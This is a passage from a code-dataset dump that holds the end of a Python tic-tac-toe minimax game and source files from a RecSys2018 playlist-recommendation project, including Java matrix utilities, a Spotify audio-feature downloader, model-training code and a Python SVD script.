',10*' ',' | | ',)\n print(' '+mark[0][0]+' | '+mark[0][1]+' | '+mark[0][2]+' ',10*' ',' 1 | 2 | 3 ')\n print('-----+----+-----',10*' ',\"-----+----+-----\")\n print(' | | ',10*' ',\" | | \")\n print(' '+mark[1][0]+' | '+mark[1][1]+' | '+mark[1][2]+' ',10*' ',\" 4 | 5 | 6 \")\n print('-----+----+-----',10*' ',\"-----+----+-----\")\n print(' | | ',10*' ',\" | | \")\n print(' '+mark[2][0]+' | '+mark[2][1]+' | '+mark[2][2]+' ',10*' ',\" 7 | 8 | 9 \\n\\n\")\n\ndef cpu_chance(cpu_marker, user_marker): # Calls minimax to 
obtain cpu's move\n\n depth = len(empty_cells(board))\n if depth == 0 or game_end(board):\n return\n\n print('Cpu turn')\n draw_board(board, cpu_marker, user_marker)\n\n if depth == 9:\n x = choice([0, 1, 2])\n y = choice([0, 1, 2])\n else:\n move = minimax(board, depth, CPU)\n x, y = move[0], move[1]\n\n set_marker(x, y, CPU)\n\n\ndef user_chance(cpu_marker, user_marker): # Ask's user for the positon to place marker\n\n depth = len(empty_cells(board))\n if depth == 0 or game_end(board):\n return\n\n move = -1\n moves = {\n 1: [0, 0], 2: [0, 1], 3: [0, 2],\n 4: [1, 0], 5: [1, 1], 6: [1, 2],\n 7: [2, 0], 8: [2, 1], 9: [2, 2],\n }\n\n print('User turn')\n draw_board(board, cpu_marker, user_marker)\n\n while move < 1 or move > 9:\n try:\n move = int(input('Enter the position to place your marker(1-9): '))\n coord = moves[move]\n can_move = set_marker(coord[0], coord[1], USER)\n\n if not can_move:\n print('Already Occupied')\n move = -1\n except (KeyError, ValueError):\n print('Bad choice')\n\n\ndef main(): #Main Function\n title()\n user_marker = '' # X or O\n cpu_marker = '' # X or O\n first = '' # if human is the first\n\n # User chooses X or O to play\n while user_marker != 'O' and user_marker != 'X':\n try:\n print('')\n user_marker = input('Choose a marker to play (X or O)\\nChosen: ').upper()\n except (KeyError, ValueError):\n print('Choose a valid marker!')\n\n # cpu's marker\n if user_marker == 'X':\n cpu_marker = 'O'\n else:\n cpu_marker = 'X'\n\n # User chance\n while first != 'Y' and first != 'N':\n try:\n first = input('First to start?[y/n]: ').upper()\n except (KeyError, ValueError):\n print('Bad choice')\n\n # Main loop \n while len(empty_cells(board)) > 0 and not game_end(board):\n if first == 'N':\n cpu_chance(cpu_marker, user_marker)\n first = ''\n\n user_chance(cpu_marker, user_marker)\n cpu_chance(cpu_marker, user_marker)\n\n # Game over\n if wins(board, USER):\n print('User turn')\n draw_board(board, cpu_marker, user_marker)\n print('USER WINS!')\n 
elif wins(board, CPU):\n print('Cpu turn')\n draw_board(board, cpu_marker, user_marker)\n print('CPU WINS!')\n else:\n draw_board(board, cpu_marker, user_marker)\n print('DRAW!')\n \n while True:\n restart = input('Do you want to play again?(y/n): ').upper()\n if restart=='Y':\n main()\n elif restart=='N':\n print('Nice playing with you ! Bbye !')\n exit() \n\n\nif __name__ == '__main__':\n main()\n" } ]
1
internetmusic/RecSys2018
https://github.com/internetmusic/RecSys2018
8351cbf7ed5de536e41b8d53cf7ba4ce0c014316
80d2b77a33758ed55c5ba8ab7eb1de305e0978a7
59f6af2d58c5867abae4bb51ebe92ba58f19317f
refs/heads/master
2022-12-01T03:09:55.052493
2020-08-15T23:46:39
2020-08-15T23:46:39
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6349353194236755, "alphanum_fraction": 0.6414048075675964, "avg_line_length": 22.521739959716797, "blob_id": "264bfb8cea98715f9d19695cb1bed24fff473a49", "content_id": "157cb28de0780f84c41486c95c750db07e498042", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1082, "license_type": "permissive", "max_line_length": 65, "num_lines": 46, "path": "/src/main/java/common/MLRandomUtils.java", "repo_name": "internetmusic/RecSys2018", "src_encoding": "UTF-8", "text": "package common;\n\nimport java.util.Random;\n\npublic class MLRandomUtils {\n\n\tpublic static float nextFloat(final float min, final float max,\n\t\t\tfinal Random rng) {\n\t\treturn min + rng.nextFloat() * (max - min);\n\t}\n\n\tpublic static void shuffle(int[] array, final Random rng) {\n\t\tfor (int i = array.length - 1; i > 0; i--) {\n\t\t\tint index = rng.nextInt(i + 1);\n\t\t\t// swap\n\t\t\tint element = array[index];\n\t\t\tarray[index] = array[i];\n\t\t\tarray[i] = element;\n\t\t}\n\t}\n\n\tpublic static void shuffle(Object[] array, int startInclusive,\n\t\t\tint endExclusive, final Random rng) {\n\t\tfinal int len = endExclusive - startInclusive;\n\n\t\tfor (int j = len - 1; j > 0; j--) {\n\t\t\tint index = rng.nextInt(j + 1) + startInclusive;\n\t\t\tint i = j + startInclusive;\n\t\t\t// swap\n\t\t\tObject element = array[index];\n\t\t\tarray[index] = array[i];\n\t\t\tarray[i] = element;\n\t\t}\n\t}\n\n\tpublic static void shuffle(Object[] array, final Random rng) {\n\t\tshuffle(array, 0, array.length, rng);\n\t}\n\n\tpublic static int[] shuffleCopy(int[] array, final Random rng) {\n\n\t\tint[] copy = array.clone();\n\t\tshuffle(copy, rng);\n\t\treturn copy;\n\t}\n}\n" }, { "alpha_fraction": 0.7052208781242371, "alphanum_fraction": 0.7204819321632385, "avg_line_length": 21.23214340209961, "blob_id": "5d3c604944c583875ed6a074cb334c632f31fcea", "content_id": "44f3fd40e9334db587d97196c631b7d0193e7a5e", 
"detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1245, "license_type": "permissive", "max_line_length": 67, "num_lines": 56, "path": "/src/main/java/main/Song.java", "repo_name": "internetmusic/RecSys2018", "src_encoding": "UTF-8", "text": "package main;\n\nimport net.minidev.json.JSONObject;\n\nimport java.io.Serializable;\n\npublic class Song implements Serializable {\n\n\tprivate static final long serialVersionUID = 6265625137029257218L;\n\tprivate String artist_name;\n\tprivate String track_uri;\n\tprivate String artist_uri;\n\tprivate String track_name;\n\tprivate String album_uri;\n\tprivate int duration_ms;\n\tprivate String album_name;\n\n\tpublic Song(final JSONObject obj) {\n\t\tthis.artist_name = obj.getAsString(\"artist_name\");\n\t\tthis.track_uri = obj.getAsString(\"track_uri\");\n\t\tthis.artist_uri = obj.getAsString(\"artist_uri\");\n\t\tthis.track_name = obj.getAsString(\"track_name\");\n\t\tthis.album_uri = obj.getAsString(\"album_uri\");\n\t\tthis.duration_ms = obj.getAsNumber(\"duration_ms\").intValue();\n\t\tthis.album_name = obj.getAsString(\"album_name\");\n\t}\n\n\tpublic String get_artist_name() {\n\t\treturn this.artist_name;\n\t}\n\n\tpublic String get_track_uri() {\n\t\treturn this.track_uri;\n\t}\n\n\tpublic String get_artist_uri() {\n\t\treturn this.artist_uri;\n\t}\n\n\tpublic String get_track_name() {\n\t\treturn this.track_name;\n\t}\n\n\tpublic String get_album_uri() {\n\t\treturn this.album_uri;\n\t}\n\n\tpublic int get_duration_ms() {\n\t\treturn this.duration_ms;\n\t}\n\n\tpublic String get_album_name() {\n\t\treturn this.album_name;\n\t}\n\n}\n" }, { "alpha_fraction": 0.6537505984306335, "alphanum_fraction": 0.6673290133476257, "avg_line_length": 28.896039962768555, "blob_id": "06163852c2b2af57e499244c2c43f7c49783a88b", "content_id": "f1d8ff0b7214545889f5b9f8df88bb45a486ab96", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, 
"language": "Java", "length_bytes": 6039, "license_type": "permissive", "max_line_length": 105, "num_lines": 202, "path": "/src/main/java/main/Executor.java", "repo_name": "internetmusic/RecSys2018", "src_encoding": "UTF-8", "text": "package main;\n\nimport java.io.BufferedWriter;\nimport java.io.File;\nimport java.io.FileWriter;\nimport java.io.IOException;\n\nimport common.ALS;\nimport common.ALS.ALSParams;\nimport common.MLTimer;\nimport common.SplitterCF;\nimport main.XGBModel.XGBModelParams;\nimport okhttp3.OkHttpClient;\nimport okhttp3.Request;\nimport okhttp3.Response;\n\npublic class Executor {\n\n\tprivate static void downloadCreativeData(Data dataLoaded, String outFile,\n\t\t\tString authToken) throws IOException {\n\t\t// Please provide your own key here\n\t\tfinal String AUTH_TOKEN = \"Bearer \" + authToken;\n\n\t\ttry (BufferedWriter bw = new BufferedWriter(new FileWriter(outFile))) {\n\n\t\t\tint nSongs = dataLoaded.songs.length;\n\t\t\tint batchSize = Math.floorDiv(nSongs, 100);\n\t\t\tOkHttpClient client = new OkHttpClient();\n\n\t\t\tfor (int batch = 0; batch < batchSize; batch++) {\n\n\t\t\t\t// uncomment and provide batch number from where to begin in\n\t\t\t\t// case the operation was terminated due to auth expiration\n\t\t\t\t/*\n\t\t\t\t * if(batch <33207) continue;\n\t\t\t\t */\n\n\t\t\t\tSystem.out.println(\"Doing batch \" + batch);\n\n\t\t\t\tint batchStart = batch * 100;\n\t\t\t\tint batchEnd = Math.min(batchStart + 100, nSongs);\n\t\t\t\t// Now form a batch of 100\n\t\t\t\tString url = \"https://api.spotify.com/v1/audio-features?ids=\";\n\t\t\t\tint firstTime = 1;\n\t\t\t\tfor (int i = batchStart; i < batchEnd; i++) {\n\t\t\t\t\tif (firstTime == 1) {\n\t\t\t\t\t\turl = url + dataLoaded.songs[i].get_track_uri()\n\t\t\t\t\t\t\t\t.split(\":\")[2];\n\t\t\t\t\t\tfirstTime = 0;\n\t\t\t\t\t} else {\n\t\t\t\t\t\turl = url + \"%2C\" + 
dataLoaded.songs[i].get_track_uri()\n\t\t\t\t\t\t\t\t.split(\":\")[2];\n\t\t\t\t\t}\n\n\t\t\t\t}\n\n\t\t\t\tRequest request = new Request.Builder().url(url)\n\t\t\t\t\t\t.addHeader(\"Authorization\", AUTH_TOKEN).build();\n\t\t\t\tResponse responses = null;\n\t\t\t\tString append = \"[\";\n\t\t\t\tString last = \"]\";\n\n\t\t\t\ttry {\n\t\t\t\t\tresponses = client.newCall(request).execute();\n\t\t\t\t} catch (IOException e) {\n\t\t\t\t\te.printStackTrace();\n\t\t\t\t}\n\t\t\t\tString jsonData = responses.body().string();\n\t\t\t\tjsonData = append + jsonData + last;\n\t\t\t\torg.json.JSONArray jsonarray = new org.json.JSONArray(jsonData);\n\n\t\t\t\tif (jsonarray.getJSONObject(0).has(\"error\")) {\n\t\t\t\t\tSystem.out.println(\"timed out pausing for a while.\");\n\t\t\t\t\ttry {\n\t\t\t\t\t\tThread.sleep(4000 + 1000);\n\n\t\t\t\t\t\ttry {\n\t\t\t\t\t\t\tresponses = client.newCall(request).execute();\n\t\t\t\t\t\t} catch (IOException e) {\n\t\t\t\t\t\t\te.printStackTrace();\n\t\t\t\t\t\t}\n\t\t\t\t\t\tjsonData = responses.body().string();\n\t\t\t\t\t\tjsonData = append + jsonData + last;\n\t\t\t\t\t\tjsonarray = new org.json.JSONArray(jsonData);\n\t\t\t\t\t} catch (InterruptedException e) {\n\t\t\t\t\t\te.printStackTrace();\n\t\t\t\t\t}\n\n\t\t\t\t}\n\t\t\t\tif (jsonarray.getJSONObject(0).has(\"error\")) {\n\t\t\t\t\tSystem.out.println(jsonarray.getJSONObject(0));\n\t\t\t\t\t// Now our key has timed out . 
SO lets just exit\n\t\t\t\t\tbw.close();\n\t\t\t\t\tSystem.out.println(\n\t\t\t\t\t\t\t\"Please refresh your key as you timed out on batch: \"\n\t\t\t\t\t\t\t\t\t+ batch);\n\t\t\t\t\tSystem.exit(1);\n\t\t\t\t}\n\n\t\t\t\torg.json.JSONArray jsonobject = (org.json.JSONArray) jsonarray\n\t\t\t\t\t\t.getJSONObject(0).get(\"audio_features\");\n\t\t\t\tString writeString = jsonobject.toString();\n\t\t\t\tif (batch == 0) {\n\t\t\t\t\twriteString = writeString.replace(\"]\", \",\");\n\t\t\t\t} else if (batch == batchSize - 1) {\n\t\t\t\t\twriteString = writeString.replace(\"[\", \"\");\n\t\t\t\t} else {\n\t\t\t\t\twriteString = writeString.replace(\"[\", \"\");\n\t\t\t\t\twriteString = writeString.replace(\"]\", \",\");\n\t\t\t\t}\n\t\t\t\tbw.write(writeString);\n\n\t\t\t}\n\t\t\tbw.close();\n\n\t\t} catch (IOException e) {\n\n\t\t\te.printStackTrace();\n\n\t\t}\n\t\tSystem.out.println(\"Extraction complete.\");\n\t}\n\n\tpublic static void main(final String[] args) {\n\t\ttry {\n\t\t\tString authToken = \"\";\n\t\t\tString creativeTrackFile = \"/media/mvolkovs/external4TB/Data/recsys2018/data/song_audio_features.txt\";\n\n\t\t\tString trainPath = \"/media/mvolkovs/external4TB/Data/recsys2018/data/train\";\n\t\t\tString testFile = \"/media/mvolkovs/external4TB/Data/recsys2018/data/test/challenge_set.json\";\n\t\t\tString pythonScriptPath = \"/home/mvolkovs/projects/vl6_recsys2018/script/svd_py.py\";\n\t\t\tString cachePath = \"/media/mvolkovs/external4TB/Data/recsys2018/models/svd/\";\n\n\t\t\tMLTimer timer = new MLTimer(\"main\");\n\t\t\ttimer.tic();\n\n\t\t\tXGBModelParams xgbParams = new XGBModelParams();\n\t\t\txgbParams.doCreative = false;\n\t\t\txgbParams.xgbModel = cachePath + \"xgb.model\";\n\n\t\t\t// load data\n\t\t\tData data = DataLoader.load(trainPath, testFile);\n\t\t\ttimer.toc(\"data loaded\");\n\n\t\t\t// download creative track features if not there\n\t\t\tif (xgbParams.doCreative == true\n\t\t\t\t\t&& new File(creativeTrackFile).exists() == false) 
{\n\t\t\t\tdownloadCreativeData(data, creativeTrackFile, authToken);\n\t\t\t}\n\n\t\t\tParsedDataLoader loader = new ParsedDataLoader(data);\n\t\t\tloader.loadPlaylists();\n\t\t\tloader.loadSongs();\n\t\t\tif (xgbParams.doCreative == true) {\n\t\t\t\tloader.loadSongExtraInfo(creativeTrackFile);\n\t\t\t}\n\t\t\tParsedData dataParsed = loader.dataParsed;\n\t\t\ttimer.toc(\"data parsed\");\n\n\t\t\t// generate split\n\t\t\tSplitterCF split = RecSysSplitter.getSplitMatching(dataParsed);\n\t\t\tRecSysSplitter.removeName(dataParsed, split);\n\t\t\ttimer.toc(\"split done\");\n\n\t\t\t// get all latents\n\t\t\tLatents latents = new Latents();\n\n\t\t\t// WMF\n\t\t\tALSParams alsParams = new ALSParams();\n\t\t\talsParams.alpha = 100;\n\t\t\talsParams.rank = 200;\n\t\t\talsParams.lambda = 0.001f;\n\t\t\talsParams.maxIter = 10;\n\t\t\tALS als = new ALS(alsParams);\n\t\t\tals.optimize(split.getRstrain().get(ParsedData.INTERACTION_KEY),\n\t\t\t\t\tnull);\n\t\t\tlatents.U = als.getU();\n\t\t\tlatents.Ucnn = als.getU();\n\t\t\tlatents.V = als.getV();\n\t\t\tlatents.Vcnn = als.getV();\n\n\t\t\t// SVD on album, artist and name\n\t\t\tSVDModel svdModel = new SVDModel(dataParsed, split, latents);\n\t\t\tsvdModel.factorizeAlbums(pythonScriptPath, cachePath);\n\t\t\tsvdModel.factorizeArtists(pythonScriptPath, cachePath);\n\t\t\tsvdModel.factorizeNames(pythonScriptPath, cachePath);\n\t\t\ttimer.toc(\"latents computed\");\n\n\t\t\t// train second stage model\n\t\t\t// Latents latents = new Latents(dataParsed);\n\t\t\tXGBModel model = new XGBModel(dataParsed, xgbParams, latents,\n\t\t\t\t\tsplit);\n\t\t\tmodel.extractFeatures2Stage(cachePath);\n\t\t\tmodel.trainModel(cachePath);\n\t\t\tmodel.submission2Stage(cachePath + \"submission.out\");\n\n\t\t} catch (Exception e) {\n\t\t\te.printStackTrace();\n\t\t}\n\n\t}\n}\n" }, { "alpha_fraction": 0.623941957950592, "alphanum_fraction": 0.6303909420967102, "avg_line_length": 32.52702713012695, "blob_id": 
"ba65b71607183487d3f6451e8709eb7355a6b62a", "content_id": "5cce4b9e3c806edcd37d3a03acd18fca7b6c5c92", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2481, "license_type": "permissive", "max_line_length": 130, "num_lines": 74, "path": "/script/svd_py.py", "repo_name": "internetmusic/RecSys2018", "src_encoding": "UTF-8", "text": "import argparse\nfrom scipy.sparse import *\nimport numpy as np\nfrom sklearn.utils.extmath import randomized_svd\n\n# Note: This file is for Java command call only, not part of this package at all.\n\ndef check_int_positive(value):\n ivalue = int(value)\n if ivalue < 0:\n raise argparse.ArgumentTypeError(\"%s is an invalid positive int value\" % value)\n return ivalue\n\n\ndef check_float_positive(value):\n ivalue = float(value)\n if ivalue <= 0:\n raise argparse.ArgumentTypeError(\"%s is an invalid positive float value\" % value)\n return ivalue\n\ndef shape(s):\n try:\n num = int(s)\n return num\n except:\n raise argparse.ArgumentTypeError(\"Sparse matrix shape must be integer\")\n\n\ndef load_csv(path, name, shape):\n data = np.genfromtxt(path + name, delimiter=',')\n matrix = csr_matrix((data[:, 2], (data[:, 0].astype('int32'), data[:, 1].astype('int32'))), shape=shape)\n return matrix\n\ndef save_np(matrix, path, name):\n np.savetxt(path + name, matrix, delimiter=',', fmt='%.5f')\n\ndef main(args):\n print(\"Reading CSV\")\n matrix_input = load_csv(path=args.path, name=args.train, shape=args.shape)\n print(\"Perform SVD\")\n P, sigma, Qt = randomized_svd(matrix_input,\n n_components=args.rank,\n n_iter=args.iter,\n\t\t\t\t power_iteration_normalizer='LU',\n random_state=1)\n\n PtimesS = np.matmul(P, np.diag(sigma))\n print \"computed P*S\"\n\n #Pt = P.T\n save_np(PtimesS, args.path, args.user)\n print \"saved P*S\"\n\n save_np(Qt.T, args.path, args.item)\n print \"saved Q\"\n\n save_np(sigma, args.path, args.sigm)\n print \"saved s\"\n\n\nif __name__ == 
\"__main__\":\n # Commandline arguments\n parser = argparse.ArgumentParser(description=\"SVD\")\n parser.add_argument('-i', dest='iter', type=check_int_positive, default=4)\n parser.add_argument('-r', dest='rank', type=check_int_positive, default=100)\n parser.add_argument('-d', dest='path', default=\"/media/wuga/Storage/python_project/wlrec/IMPLEMENTATION_Projected_LRec/data/\")\n parser.add_argument('-f', dest='train', default='matrix.csv')\n parser.add_argument('-u', dest='user', default='U.nd')\n parser.add_argument('-v', dest='item', default='V.nd')\n parser.add_argument('-s', dest='sigm', default='S.nd')\n parser.add_argument('--shape', help=\"CSR Shape\", dest=\"shape\", type=shape, nargs=2)\n args = parser.parse_args()\n\n main(args)\n" }, { "alpha_fraction": 0.6439529061317444, "alphanum_fraction": 0.6507313847541809, "avg_line_length": 24.25225257873535, "blob_id": "6ad8de38905044a638c231c64ca15ad1b4e41aa8", "content_id": "cbe306d0666c742ce9361963480e0fac3e4a1875", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 14015, "license_type": "permissive", "max_line_length": 77, "num_lines": 555, "path": "/src/main/java/common/MLSparseMatrixFlat.java", "repo_name": "internetmusic/RecSys2018", "src_encoding": "UTF-8", "text": "package common;\n\nimport java.util.Arrays;\nimport java.util.HashMap;\nimport java.util.Map;\nimport java.util.stream.IntStream;\n\nimport com.google.common.util.concurrent.AtomicDoubleArray;\n\npublic class MLSparseMatrixFlat implements MLSparseMatrix {\n\n\tprivate static final long serialVersionUID = -7708714593085005498L;\n\tpublic static final int MISSING_ROW = -1;\n\n\tprivate int[] indexes;\n\tprivate float[] values;\n\tprivate int nCols;\n\n\tpublic MLSparseMatrixFlat(final int nRowsP, final int nColsP) {\n\t\tthis.indexes = new int[nRowsP];\n\t\tArrays.fill(this.indexes, MISSING_ROW);\n\t\tthis.values = new float[nRowsP];\n\t\tthis.nCols = 
nColsP;\n\t}\n\n\tpublic MLSparseMatrixFlat(final int[] indexesP, final float[] valuesP,\n\t\t\tfinal int nColsP) {\n\t\tthis.indexes = indexesP;\n\t\tthis.values = valuesP;\n\t\tthis.nCols = nColsP;\n\t}\n\n\t@Override\n\tpublic void applyColNorm(final MLDenseVector colNorm) {\n\t\tIntStream.range(0, this.getNRows()).parallel().forEach(rowIndex -> {\n\t\t\tif (this.indexes[rowIndex] == MISSING_ROW) {\n\t\t\t\treturn;\n\t\t\t}\n\n\t\t\tfloat norm = colNorm.getValue(this.indexes[rowIndex]);\n\t\t\tif (norm > 1e-10f) {\n\t\t\t\tthis.values[rowIndex] /= norm;\n\t\t\t}\n\t\t});\n\t}\n\n\t@Override\n\tpublic void applyColSelector(final Map<Integer, Integer> selectedColMap,\n\t\t\tfinal int nColsSelected) {\n\t\tif (this.nCols == nColsSelected) {\n\t\t\tboolean noChanges = true;\n\t\t\tfor (Map.Entry<Integer, Integer> entry : selectedColMap\n\t\t\t\t\t.entrySet()) {\n\t\t\t\tif (entry.getValue() != entry.getKey()) {\n\t\t\t\t\tnoChanges = false;\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tif (noChanges == true) {\n\t\t\t\t// nothing to do\n\t\t\t\treturn;\n\t\t\t}\n\t\t}\n\n\t\tIntStream.range(0, this.getNRows()).parallel().forEach(rowIndex -> {\n\t\t\tInteger index = this.indexes[rowIndex];\n\t\t\tif (index == MISSING_ROW) {\n\t\t\t\treturn;\n\t\t\t}\n\n\t\t\tindex = selectedColMap.get(index);\n\t\t\tif (index == null) {\n\t\t\t\t// not in the map so remove this row\n\t\t\t\tthis.removeRow(rowIndex);\n\n\t\t\t} else {\n\t\t\t\tthis.indexes[rowIndex] = index;\n\t\t\t}\n\t\t});\n\n\t\tthis.setNCols(nColsSelected);\n\t}\n\n\t@Override\n\tpublic void applyRowNorm(final MLDenseVector rowNorm) {\n\t\tIntStream.range(0, this.getNRows()).parallel().forEach(rowIndex -> {\n\t\t\tif (this.indexes[rowIndex] == MISSING_ROW) {\n\t\t\t\treturn;\n\t\t\t}\n\n\t\t\tfloat norm = rowNorm.getValue(rowIndex);\n\t\t\tif (norm > 1e-5f) {\n\t\t\t\tthis.values[rowIndex] /= norm;\n\t\t\t}\n\t\t});\n\n\t}\n\n\t@Override\n\tpublic void binarizeValues() {\n\t\tArrays.fill(this.values, 
1f);\n\t}\n\n\t@Override\n\tpublic MLSparseMatrix deepCopy() {\n\t\treturn new MLSparseMatrixFlat(this.indexes.clone(), this.values.clone(),\n\t\t\t\tthis.nCols);\n\t}\n\n\t@Override\n\tpublic MLDenseVector getColNNZ() {\n\t\tfloat[] colNNZ = new float[this.getNCols()];\n\t\tIntStream.range(0, this.getNRows()).parallel().forEach(rowIndex -> {\n\t\t\tint colIndex = this.indexes[rowIndex];\n\t\t\tif (colIndex == MISSING_ROW) {\n\t\t\t\treturn;\n\t\t\t}\n\t\t\tsynchronized (colNNZ) {\n\t\t\t\tcolNNZ[colIndex] += 1;\n\t\t\t}\n\t\t});\n\t\treturn new MLDenseVector(colNNZ);\n\t}\n\n\t@Override\n\tpublic MLDenseVector getColNorm(final int p) {\n\t\t// compute L^p norm\n\t\tfinal float[] colNorm = new float[this.getNCols()];\n\t\tIntStream.range(0, this.getNRows()).parallel().forEach(rowIndex -> {\n\t\t\tint colIndex = this.indexes[rowIndex];\n\t\t\tif (colIndex == MISSING_ROW) {\n\t\t\t\treturn;\n\t\t\t}\n\t\t\tsynchronized (colNorm) {\n\t\t\t\tif (p == 1) {\n\t\t\t\t\tcolNorm[colIndex] += Math.abs(this.values[rowIndex]);\n\t\t\t\t} else {\n\t\t\t\t\tcolNorm[colIndex] += Math.pow(this.values[rowIndex], p);\n\t\t\t\t}\n\t\t\t}\n\t\t});\n\n\t\tif (p != 1) {\n\t\t\tfor (int i = 0; i < this.getNCols(); i++) {\n\t\t\t\t// take p'th root\n\t\t\t\tcolNorm[i] = (float) Math.pow(colNorm[i], 1.0 / p);\n\t\t\t}\n\t\t}\n\t\treturn new MLDenseVector(colNorm);\n\t}\n\n\t@Override\n\tpublic MLDenseVector getColSum() {\n\t\tfloat[] colSum = new float[this.getNCols()];\n\t\tIntStream.range(0, this.getNRows()).parallel().forEach(rowIndex -> {\n\t\t\tint colIndex = this.indexes[rowIndex];\n\t\t\tif (colIndex == MISSING_ROW) {\n\t\t\t\treturn;\n\t\t\t}\n\t\t\tsynchronized (colSum) {\n\t\t\t\tcolSum[colIndex] += this.values[rowIndex];\n\t\t\t}\n\t\t});\n\t\treturn new MLDenseVector(colSum);\n\t}\n\n\t@Override\n\tpublic MLDenseVector getRowSum() {\n\t\treturn new MLDenseVector(this.values);\n\t}\n\n\t@Override\n\tpublic int getNCols() {\n\t\treturn this.nCols;\n\t}\n\n\t@Override\n\tpublic 
long getNNZ() {\n\t\tlong nnz = 0;\n\t\tfor (int i = 0; i < this.indexes.length; i++) {\n\t\t\tif (this.indexes[i] != MISSING_ROW) {\n\t\t\t\tnnz++;\n\t\t\t}\n\t\t}\n\t\treturn nnz;\n\t}\n\n\t@Override\n\tpublic int getNRows() {\n\t\treturn this.indexes.length;\n\t}\n\n\t@Override\n\tpublic MLSparseVector getRow(final int rowIndex) {\n\t\tint colIndex = this.indexes[rowIndex];\n\t\tif (colIndex == MISSING_ROW) {\n\t\t\treturn null;\n\t\t}\n\n\t\treturn new MLSparseVector(new int[] { colIndex },\n\t\t\t\tnew float[] { this.values[rowIndex] }, null, this.nCols);\n\t}\n\n\t@Override\n\tpublic MLSparseVector getRow(final int rowIndex, boolean returnEmpty) {\n\t\tMLSparseVector row = this.getRow(rowIndex);\n\t\tif (row == null && returnEmpty == true) {\n\t\t\t// return empty row instead of null\n\t\t\trow = new MLSparseVector(new int[] {}, new float[] {}, null,\n\t\t\t\t\tthis.getNCols());\n\t\t}\n\t\treturn row;\n\t}\n\n\t@Override\n\tpublic MLDenseVector getRowNNZ() {\n\t\tfloat[] rowNNZ = new float[this.getNRows()];\n\t\tIntStream.range(0, this.getNRows()).parallel().forEach(rowIndex -> {\n\t\t\tint colIndex = this.indexes[rowIndex];\n\t\t\tif (colIndex == MISSING_ROW) {\n\t\t\t\treturn;\n\t\t\t}\n\t\t\trowNNZ[rowIndex] = 1;\n\t\t});\n\t\treturn new MLDenseVector(rowNNZ);\n\t}\n\n\t@Override\n\tpublic MLDenseVector getRowNorm(final int p) {\n\t\tfinal float[] rowNorm = new float[this.getNRows()];\n\t\tSystem.arraycopy(values, 0, rowNorm, 0, rowNorm.length);\n\t\treturn new MLDenseVector(rowNorm);\n\t}\n\n\t@Override\n\tpublic boolean hasDates() {\n\t\treturn false;\n\t}\n\n\t@Override\n\tpublic void inferAndSetNCols() {\n\t\t// infer number of columns if it wasn't known during constructor\n\t\tint nColsNew = 0;\n\n\t\tfor (int i = 0; i < this.indexes.length; i++) {\n\t\t\tint colIndex = this.indexes[i];\n\t\t\tif (colIndex == MISSING_ROW) {\n\t\t\t\tcontinue;\n\t\t\t}\n\n\t\t\tif (colIndex + 1 > nColsNew) {\n\t\t\t\t// nCols is 1 + largest col index\n\t\t\t\tnColsNew 
= colIndex + 1;\n\t\t\t}\n\t\t}\n\n\t\tthis.setNCols(nColsNew);\n\t}\n\n\t@Override\n\tpublic MLSparseMatrix mult(final MLSparseMatrix another) {\n\t\tif (this.getNCols() != another.getNRows()) {\n\t\t\tthrow new IllegalArgumentException(\n\t\t\t\t\t\"this.getNCols() != another.getNRows()\");\n\t\t}\n\t\tMLSparseVector[] resultRows = new MLSparseVector[this.getNRows()];\n\t\tIntStream.range(0, this.getNRows()).parallel().forEach(i -> {\n\t\t\tint index = this.indexes[i];\n\t\t\tif (index == MISSING_ROW) {\n\t\t\t\treturn;\n\t\t\t}\n\t\t\tfloat value = this.values[i];\n\t\t\tfloat[] resultRow = new float[another.getNCols()];\n\t\t\tMLSparseVector rowAnother = another.getRow(index);\n\t\t\tif (rowAnother != null) {\n\n\t\t\t\tint[] indexesAnother = rowAnother.getIndexes();\n\t\t\t\tfloat[] valuesAnother = rowAnother.getValues();\n\t\t\t\tfor (int k = 0; k < indexesAnother.length; k++) {\n\t\t\t\t\tresultRow[indexesAnother[k]] += value * valuesAnother[k];\n\t\t\t\t}\n\t\t\t}\n\t\t\tMLSparseVector resultRowSparse = MLSparseVector\n\t\t\t\t\t.fromDense(new MLDenseVector(resultRow));\n\t\t\tif (resultRowSparse.getIndexes() != null) {\n\t\t\t\tresultRows[i] = resultRowSparse;\n\t\t\t}\n\t\t});\n\n\t\treturn new MLSparseMatrixAOO(resultRows, another.getNCols());\n\t}\n\n\t@Override\n\tpublic MLDenseVector multCol(final MLDenseVector vector) {\n\n\t\t// multiply 1 x nRows dense vector with this matrix\n\t\tif (this.getNRows() != vector.getLength()) {\n\t\t\tthrow new IllegalArgumentException(\n\t\t\t\t\t\"this.getNRows() != vector.getLength()\");\n\t\t}\n\n\t\tAtomicDoubleArray result = new AtomicDoubleArray(this.nCols);\n\t\tIntStream.range(0, this.getNRows()).parallel().forEach(rowIndex -> {\n\t\t\tfloat val = vector.getValue(rowIndex);\n\t\t\tif (val == 0) {\n\t\t\t\treturn;\n\t\t\t}\n\n\t\t\tint colIndex = this.indexes[rowIndex];\n\t\t\tif (colIndex == MISSING_ROW) {\n\t\t\t\treturn;\n\t\t\t}\n\t\t\tfloat colValue = 
